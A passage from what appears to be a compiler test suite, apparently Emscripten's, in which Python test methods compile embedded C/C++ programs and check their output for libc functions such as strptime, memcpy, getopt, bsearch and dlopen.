#extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/langinfo.h,libc/time.h'])
def test_timeb(self):
# Confirms ftime() succeeds and fills in sane timeb fields
src = r'''
#include <stdio.h>
#include <assert.h>
#include <sys/timeb.h>
int main() {
timeb tb;
tb.timezone = 1;
printf("*%d\n", ftime(&tb));
assert(tb.time > 10000);
assert(tb.timezone == 0);
assert(tb.dstflag == 0);
return 0;
}
'''
self.do_run(src, '*0\n')
def test_time_c(self):
src = r'''
#include <time.h>
#include <stdio.h>
int main() {
time_t t = time(0);
printf("time: %s\n", ctime(&t));
}
'''
self.do_run(src, 'time: ') # compilation check, mainly
def test_strptime_tm(self):
src=r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
int main() {
struct tm tm;
char *ptr = strptime("17410105012000", "%H%M%S%d%m%Y", &tm);
printf("%s: %s, %d/%d/%d %d:%d:%d",
(ptr != NULL && *ptr=='\0') ? "OK" : "ERR",
tm.tm_wday == 0 ? "Sun" : (tm.tm_wday == 1 ? "Mon" : (tm.tm_wday == 2 ? "Tue" : (tm.tm_wday == 3 ? "Wed" : (tm.tm_wday == 4 ? "Thu" : (tm.tm_wday == 5 ? "Fri" : (tm.tm_wday == 6 ? "Sat" : "ERR")))))),
tm.tm_mon+1,
tm.tm_mday,
tm.tm_year+1900,
tm.tm_hour,
tm.tm_min,
tm.tm_sec
);
}
'''
self.do_run(src, 'OK: Wed, 1/5/2000 17:41:1')
def test_strptime_days(self):
src = r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
static const struct {
const char *input;
const char *format;
} day_tests[] = {
{ "2000-01-01", "%Y-%m-%d"},
{ "03/03/00", "%D"},
{ "9/9/99", "%x"},
{ "19990502123412", "%Y%m%d%H%M%S"},
{ "2001 20 Mon", "%Y %U %a"},
{ "2006 4 Fri", "%Y %U %a"},
{ "2001 21 Mon", "%Y %W %a"},
{ "2013 29 Wed", "%Y %W %a"},
{ "2000-01-01 08:12:21 AM", "%Y-%m-%d %I:%M:%S %p"},
{ "2000-01-01 08:12:21 PM", "%Y-%m-%d %I:%M:%S %p"},
{ "2001 17 Tue", "%Y %U %a"},
{ "2001 8 Thursday", "%Y %W %a"},
};
int main() {
struct tm tm;
for (int i = 0; i < sizeof (day_tests) / sizeof (day_tests[0]); ++i) {
memset (&tm, '\0', sizeof (tm));
char *ptr = strptime(day_tests[i].input, day_tests[i].format, &tm);
printf("%s: %d/%d/%d (%dth DoW, %dth DoY)\n", (ptr != NULL && *ptr=='\0') ? "OK" : "ERR", tm.tm_mon+1, tm.tm_mday, 1900+tm.tm_year, tm.tm_wday, tm.tm_yday);
}
}
'''
self.do_run(src, 'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 3/3/2000 (5th DoW, 62th DoY)\n'\
'OK: 9/9/1999 (4th DoW, 251th DoY)\n'\
'OK: 5/2/1999 (0th DoW, 121th DoY)\n'\
'OK: 5/21/2001 (1th DoW, 140th DoY)\n'\
'OK: 1/27/2006 (5th DoW, 26th DoY)\n'\
'OK: 5/21/2001 (1th DoW, 140th DoY)\n'\
'OK: 7/24/2013 (3th DoW, 204th DoY)\n'\
'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 1/1/2000 (6th DoW, 0th DoY)\n'\
'OK: 5/1/2001 (2th DoW, 120th DoY)\n'\
'OK: 2/22/2001 (4th DoW, 52th DoY)\n'\
)
def test_strptime_reentrant(self):
src=r'''
#include <time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main () {
int result = 0;
struct tm tm;
memset (&tm, 0xaa, sizeof (tm));
/* Test we don't crash on uninitialized struct tm.
Some fields might contain bogus values until everything
needed is initialized, but we shouldn't crash. */
if (strptime ("2007", "%Y", &tm) == NULL
|| strptime ("12", "%d", &tm) == NULL
|| strptime ("Feb", "%b", &tm) == NULL
|| strptime ("13", "%M", &tm) == NULL
|| strptime ("21", "%S", &tm) == NULL
|| strptime ("16", "%H", &tm) == NULL) {
printf("ERR: returned NULL");
exit(EXIT_FAILURE);
}
if (tm.tm_sec != 21 || tm.tm_min != 13 || tm.tm_hour != 16
|| tm.tm_mday != 12 || tm.tm_mon != 1 || tm.tm_year != 107
|| tm.tm_wday != 1 || tm.tm_yday != 42) {
printf("ERR: unexpected tm content (1) - %d/%d/%d %d:%d:%d", tm.tm_mon+1, tm.tm_mday, tm.tm_year+1900, tm.tm_hour, tm.tm_min, tm.tm_sec);
exit(EXIT_FAILURE);
}
if (strptime ("8", "%d", &tm) == NULL) {
printf("ERR: strptime failed");
exit(EXIT_FAILURE);
}
if (tm.tm_sec != 21 || tm.tm_min != 13 || tm.tm_hour != 16
|| tm.tm_mday != 8 || tm.tm_mon != 1 || tm.tm_year != 107
|| tm.tm_wday != 4 || tm.tm_yday != 38) {
printf("ERR: unexpected tm content (2) - %d/%d/%d %d:%d:%d", tm.tm_mon+1, tm.tm_mday, tm.tm_year+1900, tm.tm_hour, tm.tm_min, tm.tm_sec);
exit(EXIT_FAILURE);
}
printf("OK");
}
'''
self.do_run(src, 'OK')
def test_intentional_fault(self):
# Some programs intentionally segfault themselves, we should compile that into a throw
src = r'''
int main () {
*(volatile char *)0 = 0;
return 0;
}
'''
self.do_run(src, 'fault on write to 0' if not Settings.ASM_JS else 'Assertion: 0')
def test_trickystring(self):
src = r'''
#include <stdio.h>
typedef struct
{
int (*f)(void *);
void *d;
char s[16];
} LMEXFunctionStruct;
int f(void *user)
{
return 0;
}
static LMEXFunctionStruct const a[] =
{
{f, (void *)(int)'a', "aa"}
};
int main()
{
printf("ok\n");
return a[0].f(a[0].d);
}
'''
self.do_run(src, 'ok\n')
def test_statics(self):
# static initializers save i16 but load i8 for some reason (or i64 and load i8)
if Settings.SAFE_HEAP:
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ['src.cpp:19', 'src.cpp:26', 'src.cpp:28']
src = '''
#include <stdio.h>
#include <string.h>
#define CONSTRLEN 32
char * (*func)(char *, const char *) = NULL;
void conoutfv(const char *fmt)
{
static char buf[CONSTRLEN];
func(buf, fmt); // call by function pointer to make sure we test strcpy here
puts(buf);
}
struct XYZ {
float x, y, z;
XYZ(float a, float b, float c) : x(a), y(b), z(c) { }
static const XYZ& getIdentity()
{
static XYZ iT(1,2,3);
return iT;
}
};
struct S {
static const XYZ& getIdentity()
{
static const XYZ iT(XYZ::getIdentity());
return iT;
}
};
int main() {
func = &strcpy;
conoutfv("*staticccz*");
printf("*%.2f,%.2f,%.2f*\\n", S::getIdentity().x, S::getIdentity().y, S::getIdentity().z);
return 0;
}
'''
self.do_run(src, '*staticccz*\n*1.00,2.00,3.00*')
def test_copyop(self):
if self.emcc_args is None: return self.skip('requires emcc')
# clang generated code is vulnerable to this, as it uses
# memcpy for assignments, with hardcoded numbers of bytes
# (llvm-gcc copies items one by one). See QUANTUM_SIZE in
# settings.js.
src = '''
#include <stdio.h>
#include <math.h>
#include <string.h>
struct vec {
double x,y,z;
vec() : x(0), y(0), z(0) { };
vec(const double a, const double b, const double c) : x(a), y(b), z(c) { };
};
struct basis {
vec a, b, c;
basis(const vec& v) {
a=v; // should not touch b!
printf("*%.2f,%.2f,%.2f*\\n", b.x, b.y, b.z);
}
};
int main() {
basis B(vec(1,0,0));
// Part 2: similar problem with memset and memmove
int x = 1, y = 77, z = 2;
memset((void*)&x, 0, sizeof(int));
memset((void*)&z, 0, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
memcpy((void*)&x, (void*)&z, sizeof(int));
memcpy((void*)&z, (void*)&x, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
memmove((void*)&x, (void*)&z, sizeof(int));
memmove((void*)&z, (void*)&x, sizeof(int));
printf("*%d,%d,%d*\\n", x, y, z);
return 0;
}
'''
self.do_run(src, '*0.00,0.00,0.00*\n*0,77,0*\n*0,77,0*\n*0,77,0*')
def test_memcpy_memcmp(self):
src = '''
#include <stdio.h>
#include <string.h>
#include <assert.h>
#define MAXX 48
void reset(unsigned char *buffer) {
for (int i = 0; i < MAXX; i++) buffer[i] = i+1;
}
void dump(unsigned char *buffer) {
for (int i = 0; i < MAXX-1; i++) printf("%2d,", buffer[i]);
printf("%d\\n", buffer[MAXX-1]);
}
int main() {
unsigned char buffer[MAXX];
for (int i = MAXX/4; i < MAXX-MAXX/4; i++) {
for (int j = MAXX/4; j < MAXX-MAXX/4; j++) {
for (int k = 1; k < MAXX/4; k++) {
if (i == j) continue;
if (i < j && i+k > j) continue;
if (j < i && j+k > i) continue;
printf("[%d,%d,%d] ", i, j, k);
reset(buffer);
memcpy(buffer+i, buffer+j, k);
dump(buffer);
assert(memcmp(buffer+i, buffer+j, k) == 0);
buffer[i + k/2]++;
if (buffer[i + k/2] != 0) {
assert(memcmp(buffer+i, buffer+j, k) > 0);
} else {
assert(memcmp(buffer+i, buffer+j, k) < 0);
}
buffer[i + k/2]--;
buffer[j + k/2]++;
if (buffer[j + k/2] != 0) {
assert(memcmp(buffer+i, buffer+j, k) < 0);
} else {
assert(memcmp(buffer+i, buffer+j, k) > 0);
}
}
}
}
return 0;
}
'''
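# The triple loop prints a large dump, so compare a SHA-1 digest of the output
# instead of the raw text (hashlib is assumed to be imported at module level).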
def check(result, err):
return hashlib.sha1(result).hexdigest()
self.do_run(src, '6c9cdfe937383b79e52ca7a2cce83a21d9f5422c',
output_nicerizer = check)
def test_memcpy2(self):
src = r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
char buffer[256];
for (int i = 0; i < 10; i++) {
for (int j = 0; j < 10; j++) {
for (int k = 0; k < 35; k++) {
for (int t = 0; t < 256; t++) buffer[t] = t;
char *dest = buffer + i + 128;
char *src = buffer+j;
//printf("%d, %d, %d\n", i, j, k);
assert(memcpy(dest, src, k) == dest);
assert(memcmp(dest, src, k) == 0);
}
}
}
printf("ok.\n");
return 1;
}
'''
self.do_run(src, 'ok.')
def test_getopt(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = '''
#pragma clang diagnostic ignored "-Winvalid-pp-token"
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
int
main(int argc, char *argv[])
{
int flags, opt;
int nsecs, tfnd;
nsecs = 0;
tfnd = 0;
flags = 0;
while ((opt = getopt(argc, argv, "nt:")) != -1) {
switch (opt) {
case 'n':
flags = 1;
break;
case 't':
nsecs = atoi(optarg);
tfnd = 1;
break;
default: /* '?' */
fprintf(stderr, "Usage: %s [-t nsecs] [-n] name\\n",
argv[0]);
exit(EXIT_FAILURE);
}
}
printf("flags=%d; tfnd=%d; optind=%d\\n", flags, tfnd, optind);
if (optind >= argc) {
fprintf(stderr, "Expected argument after options\\n");
exit(EXIT_FAILURE);
}
printf("name argument = %s\\n", argv[optind]);
/* Other code omitted */
exit(EXIT_SUCCESS);
}
'''
self.do_run(src, 'flags=1; tfnd=1; optind=4\nname argument = foobar', args=['-t', '12', '-n', 'foobar'])
def test_getopt_long(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = '''
#pragma clang diagnostic ignored "-Winvalid-pp-token"
#pragma clang diagnostic ignored "-Wdeprecated-writable-strings"
#include <stdio.h> /* for printf */
#include <stdlib.h> /* for exit */
#include <getopt.h>
int
main(int argc, char **argv)
{
int c;
int digit_optind = 0;
while (1) {
int this_option_optind = optind ? optind : 1;
int option_index = 0;
static struct option long_options[] = {
{"add", required_argument, 0, 0 },
{"append", no_argument, 0, 0 },
{"delete", required_argument, 0, 0 },
{"verbose", no_argument, 0, 0 },
{"create", required_argument, 0, 'c'},
{"file", required_argument, 0, 0 },
{0, 0, 0, 0 }
};
c = getopt_long(argc, argv, "abc:d:012",
long_options, &option_index);
if (c == -1)
break;
switch (c) {
case 0:
printf("option %s", long_options[option_index].name);
if (optarg)
printf(" with arg %s", optarg);
printf("\\n");
break;
case '0':
case '1':
case '2':
if (digit_optind != 0 && digit_optind != this_option_optind)
printf("digits occur in two different argv-elements.\\n");
digit_optind = this_option_optind;
printf("option %c\\n", c);
break;
case 'a':
printf("option a\\n");
break;
case 'b':
printf("option b\\n");
break;
case 'c':
printf("option c with value '%s'\\n", optarg);
break;
case 'd':
printf("option d with value '%s'\\n", optarg);
break;
case '?':
break;
default:
printf("?? getopt returned character code 0%o ??\\n", c);
}
}
if (optind < argc) {
printf("non-option ARGV-elements: ");
while (optind < argc)
printf("%s ", argv[optind++]);
printf("\\n");
}
exit(EXIT_SUCCESS);
}
'''
self.do_run(src, 'option file with arg foobar\noption b', args=['--file', 'foobar', '-b'])
def test_memmove(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char str[] = "memmove can be very useful....!";
memmove (str+20, str+15, 11);
puts(str);
return 0;
}
'''
self.do_run(src, 'memmove can be very very useful')
def test_memmove2(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('need ta2')
src = r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
int sum = 0;
char buffer[256];
for (int i = 0; i < 10; i++) {
for (int j = 0; j < 10; j++) {
for (int k = 0; k < 35; k++) {
for (int t = 0; t < 256; t++) buffer[t] = t;
char *dest = buffer + i;
char *src = buffer + j;
if (dest == src) continue;
//printf("%d, %d, %d\n", i, j, k);
assert(memmove(dest, src, k) == dest);
for (int t = 0; t < 256; t++) sum += buffer[t];
}
}
}
printf("final: %d.\n", sum);
return 1;
}
'''
self.do_run(src, 'final: -403200.')
def test_memmove3(self):
src = '''
#include <stdio.h>
#include <string.h>
int main() {
char str[] = "memmove can be vvery useful....!";
memmove(str+15, str+16, 17);
puts(str);
return 0;
}
'''
self.do_run(src, 'memmove can be very useful....!')
def test_bsearch(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('Test cannot work with q1')
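# Exercises bsearch with keys that exist, in-range keys that are absent, and
# keys outside the array's range.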
src = '''
#include <stdlib.h>
#include <stdio.h>
int cmp(const void* key, const void* member) {
return *(int *)key - *(int *)member;
}
void printResult(int* needle, int* haystack, unsigned int len) {
void *result = bsearch(needle, haystack, len, sizeof(unsigned int), cmp);
if (result == NULL) {
printf("null\\n");
} else {
printf("%d\\n", *(unsigned int *)result);
}
}
int main() {
int a[] = { -2, -1, 0, 6, 7, 9 };
int b[] = { 0, 1 };
/* Find all keys that exist. */
for(int i = 0; i < 6; i++) {
int val = a[i];
printResult(&val, a, 6);
}
/* Keys that are covered by the range of the array but aren't in
* the array cannot be found.
*/
int v1 = 3;
int v2 = 8;
printResult(&v1, a, 6);
printResult(&v2, a, 6);
/* Keys outside the range of the array cannot be found. */
int v3 = -1;
int v4 = 2;
printResult(&v3, b, 2);
printResult(&v4, b, 2);
return 0;
}
'''
self.do_run(src, '-2\n-1\n0\n6\n7\n9\nnull\nnull\nnull\nnull')
def test_nestedstructs(self):
src = '''
#include <stdio.h>
#include "emscripten.h"
struct base {
int x;
float y;
union {
int a;
float b;
};
char c;
};
struct hashtableentry {
int key;
base data;
};
struct hashset {
typedef hashtableentry entry;
struct chain { entry elem; chain *next; };
// struct chainchunk { chain chains[100]; chainchunk *next; };
};
struct hashtable : hashset {
hashtable() {
base *b = NULL;
entry *e = NULL;
chain *c = NULL;
printf("*%d,%d,%d,%d,%d,%d|%d,%d,%d,%d,%d,%d,%d,%d|%d,%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n",
sizeof(base),
int(&(b->x)), int(&(b->y)), int(&(b->a)), int(&(b->b)), int(&(b->c)),
sizeof(hashtableentry),
int(&(e->key)), int(&(e->data)), int(&(e->data.x)), int(&(e->data.y)), int(&(e->data.a)), int(&(e->data.b)), int(&(e->data.c)),
sizeof(hashset::chain),
int(&(c->elem)), int(&(c->next)), int(&(c->elem.key)), int(&(c->elem.data)), int(&(c->elem.data.x)), int(&(c->elem.data.y)), int(&(c->elem.data.a)), int(&(c->elem.data.b)), int(&(c->elem.data.c))
);
}
};
struct B { char buffer[62]; int last; char laster; char laster2; };
struct Bits {
unsigned short A : 1;
unsigned short B : 1;
unsigned short C : 1;
unsigned short D : 1;
unsigned short x1 : 1;
unsigned short x2 : 1;
unsigned short x3 : 1;
unsigned short x4 : 1;
};
int main() {
hashtable t;
// Part 2 - the char[] should be compressed, BUT have a padding space at the end so the next
// one is aligned properly. Also handle char; char; etc. properly.
B *b = NULL;
printf("*%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n", int(b), int(&(b->buffer)), int(&(b->buffer[0])), int(&(b->buffer[1])), int(&(b->buffer[2])),
int(&(b->last)), int(&(b->laster)), int(&(b->laster2)), sizeof(B));
// Part 3 - bitfields, and small structures
Bits *b2 = NULL;
printf("*%d*\\n", sizeof(Bits));
return 0;
}
'''
if Settings.QUANTUM_SIZE == 1:
# Compressed memory. Note that sizeof() does give the fat sizes, however!
self.do_run(src, '*16,0,1,2,2,3|20,0,1,1,2,3,3,4|24,0,5,0,1,1,2,3,3,4*\n*0,0,0,1,2,62,63,64,72*\n*2*')
else:
# Bloated memory; same layout as C/C++
self.do_run(src, '*16,0,4,8,8,12|20,0,4,4,8,12,12,16|24,0,20,0,4,4,8,12,12,16*\n*0,0,0,1,2,64,68,69,72*\n*2*')
def test_runtimelink(self):
return self.skip('shared libs are deprecated')
if Building.LLVM_OPTS: return self.skip('LLVM opts will optimize printf into puts in the parent, and the child will still look for puts')
if Settings.ASM_JS: return self.skip('asm does not support runtime linking')
main, supp = self.setup_runtimelink_test()
self.banned_js_engines = [NODE_JS] # node's global scope behaves differently than everything else, needs investigation FIXME
Settings.LINKABLE = 1
Settings.BUILD_AS_SHARED_LIB = 2
Settings.NAMED_GLOBALS = 1
self.build(supp, self.get_dir(), self.in_dir('supp.cpp'))
shutil.move(self.in_dir('supp.cpp.o.js'), self.in_dir('liblib.so'))
Settings.BUILD_AS_SHARED_LIB = 0
Settings.RUNTIME_LINKED_LIBS = ['liblib.so']
self.do_run(main, 'supp: 54,2\nmain: 56\nsupp see: 543\nmain see: 76\nok.')
def test_dlfcn_basic(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.NAMED_GLOBALS = 1
Settings.LINKABLE = 1
lib_src = '''
#include <cstdio>
class Foo {
public:
Foo() {
printf("Constructing lib object.\\n");
}
};
Foo global;
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <cstdio>
#include <dlfcn.h>
class Bar {
public:
Bar() {
printf("Constructing main object.\\n");
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\n',
post_build=add_pre_run_and_checks)
def test_dlfcn_qsort(self):
return self.skip('shared libs are deprecated')
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1 # Needed for unsafe optimizations
lib_src = '''
int lib_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a > *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
typedef int (*CMP_TYPE)(const void*, const void*);
extern "C" CMP_TYPE get_cmp() {
return lib_cmp;
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_get_cmp']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int (*CMP_TYPE)(const void*, const void*);
int main_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a < *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
int main() {
void* lib_handle;
CMP_TYPE (*getter_ptr)();
CMP_TYPE lib_cmp_ptr;
int arr[5] = {4, 2, 5, 1, 3};
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
getter_ptr = (CMP_TYPE (*)()) dlsym(lib_handle, "get_cmp");
if (getter_ptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
lib_cmp_ptr = getter_ptr();
qsort((void*)arr, 5, sizeof(int), main_cmp);
printf("Sort with main comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
qsort((void*)arr, 5, sizeof(int), lib_cmp_ptr);
printf("Sort with lib comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Sort with main comparison: 5 4 3 2 1 *Sort with lib comparison: 1 2 3 4 5 *',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks)
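# Checks that function pointers and global data cross the main/library
# boundary in both directions.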
def test_dlfcn_data_and_fptr(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
if Building.LLVM_OPTS: return self.skip('LLVM opts will optimize out parent_func')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
lib_src = '''
#include <stdio.h>
int global = 42;
extern void parent_func(); // a function that is defined in the parent
void lib_fptr() {
printf("Second calling lib_fptr from main.\\n");
parent_func();
// call it also through a pointer, to check indexizing
void (*p_f)();
p_f = parent_func;
p_f();
}
extern "C" void (*func(int x, void(*fptr)()))() {
printf("In func: %d\\n", x);
fptr();
return lib_fptr;
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
Settings.EXPORTED_GLOBALS = ['_global']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = '''
#include <stdio.h>
#include <dlfcn.h>
typedef void (*FUNCTYPE(int, void(*)()))();
FUNCTYPE func;
void parent_func() {
printf("parent_func called from child\\n");
}
void main_fptr() {
printf("First calling main_fptr from lib.\\n");
}
int main() {
void* lib_handle;
FUNCTYPE* func_fptr;
// Test basic lib loading.
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
// Test looked up function.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
// Load twice to test cache.
func_fptr = (FUNCTYPE*) dlsym(lib_handle, "func");
if (func_fptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
// Test passing function pointers across module bounds.
void (*fptr)() = func_fptr(13, main_fptr);
fptr();
// Test global data.
int* global = (int*) dlsym(lib_handle, "global");
if (global == NULL) {
printf("Could not find global.\\n");
return 1;
}
printf("Var: %d\\n", *global);
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
Settings.EXPORTED_GLOBALS = []
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'In func: 13*First calling main_fptr from lib.*Second calling lib_fptr from main.*parent_func called from child*parent_func called from child*Var: 42*',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks)
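# The library references a global that is defined (and later mutated) in the
# parent module.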
def test_dlfcn_alias(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Building.LLVM_OPTS == 2: return self.skip('LLVM LTO will optimize away stuff we expect from the shared library')
lib_src = r'''
#include <stdio.h>
extern int parent_global;
extern "C" void func() {
printf("Parent global: %d.\n", parent_global);
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = r'''
#include <dlfcn.h>
int parent_global = 123;
int main() {
void* lib_handle;
void (*fptr)();
lib_handle = dlopen("liblib.so", RTLD_NOW);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
parent_global = 456;
fptr();
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.INCLUDE_FULL_LIBRARY = 1
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, 'Parent global: 123.*Parent global: 456.*',
output_nicerizer=lambda x, err: x.replace('\n', '*'),
post_build=add_pre_run_and_checks,
extra_emscripten_args=['-H', 'libc/fcntl.h,libc/sys/unistd.h,poll.h,libc/math.h,libc/time.h,libc/langinfo.h'])
Settings.INCLUDE_FULL_LIBRARY = 0
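# Varargs across the dlopen boundary: the library calls a vararg function
# defined in the main module.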
def test_dlfcn_varargs(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('TODO: dlopen in asm')
Settings.LINKABLE = 1
Settings.NAMED_GLOBALS = 1
if Building.LLVM_OPTS == 2: return self.skip('LLVM LTO will optimize things that prevent shared objects from working')
if Settings.QUANTUM_SIZE == 1: return self.skip('FIXME: Add support for this')
lib_src = r'''
void print_ints(int n, ...);
extern "C" void func() {
print_ints(2, 13, 42);
}
'''
dirname = self.get_dir()
filename = os.path.join(dirname, 'liblib.cpp')
Settings.BUILD_AS_SHARED_LIB = 1
Settings.EXPORTED_FUNCTIONS = ['_func']
self.build(lib_src, dirname, filename)
shutil.move(filename + '.o.js', os.path.join(dirname, 'liblib.so'))
src = r'''
#include <stdarg.h>
#include <stdio.h>
#include <dlfcn.h>
void print_ints(int n, ...) {
va_list args;
va_start(args, n);
for (int i = 0; i < n; i++) {
printf("%d\n", va_arg(args, int));
}
va_end(args);
}
int main() {
void* lib_handle;
void (*fptr)();
print_ints(2, 100, 200);
lib_handle = dlopen("liblib.so", RTLD_NOW);
fptr = (void (*)())dlsym(lib_handle, "func");
fptr();
return 0;
}
'''
Settings.BUILD_AS_SHARED_LIB = 0
Settings.EXPORTED_FUNCTIONS = ['_main']
add_pre_run_and_checks = '''
def process(filename):
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createLazyFile('/', 'liblib.so', 'liblib.so', true, false);"
)
open(filename, 'w').write(src)
'''
self.do_run(src, '100\n200\n13\n42\n',
post_build=add_pre_run_and_checks)
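# dlopen(NULL) returns a handle to the main module itself; the post hook
# parses the generated symbol table and checks it contains exactly the
# expected symbols.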
def test_dlfcn_self(self):
if Settings.USE_TYPED_ARRAYS == 1: return self.skip('Does not work with USE_TYPED_ARRAYS=1')
Settings.DLOPEN_SUPPORT = 1
src = r'''
#include <stdio.h>
#include <dlfcn.h>
int global = 123;
extern "C" __attribute__((noinline)) void foo(int x) {
printf("%d\n", x);
}
extern "C" __attribute__((noinline)) void repeatable() {
void* self = dlopen(NULL, RTLD_LAZY);
int* global_ptr = (int*)dlsym(self, "global");
void (*foo_ptr)(int) = (void (*)(int))dlsym(self, "foo");
foo_ptr(*global_ptr);
dlclose(self);
}
int main() {
repeatable();
repeatable();
return 0;
}'''
def post(filename):
with open(filename) as f:
for line in f:
if 'var SYMBOL_TABLE' in line:
table = line
break
else:
raise Exception('Could not find symbol table!')
import json
table = json.loads(table[table.find('{'):table.rfind('}')+1])
actual = list(sorted(table.keys()))
# ensure there aren't too many globals; we don't want unnamed_addr
assert actual == ['_foo', '_global', '_main', '_repeatable'], \
"Symbol table does not match: %s" % actual
self.do_run(src, '123\n123', post_build=(None, post))
def test_rand(self):
return self.skip('rand() is now random') # FIXME
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%d\n", rand());
printf("%d\n", rand());
srand(123);
printf("%d\n", rand());
printf("%d\n", rand());
srand(123);
printf("%d\n", rand());
printf("%d\n", rand());
unsigned state = 0;
int r;
r = rand_r(&state);
printf("%d, %u\n", r, state);
r = rand_r(&state);
printf("%d, %u\n", r, state);
state = 0;
r = rand_r(&state);
printf("%d, %u\n", r, state);
return 0;
}
'''
expected = '''
1250496027
1116302336
440917656
1476150784
440917656
1476150784
12345, 12345
1406932606, 3554416254
12345, 12345
'''
self.do_run(src, re.sub(r'(^|\n)\s+', r'\1', expected))
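# strtod edge cases: signed zero, leading junk, exponents, overflow to inf,
# and endptr positioning.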
def test_strtod(self):
if self.emcc_args is None: return self.skip('needs emcc for libc')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
char* endptr;
printf("\n");
printf("%g\n", strtod("0", &endptr));
printf("%g\n", strtod("0.", &endptr));
printf("%g\n", strtod("0.0", &endptr));
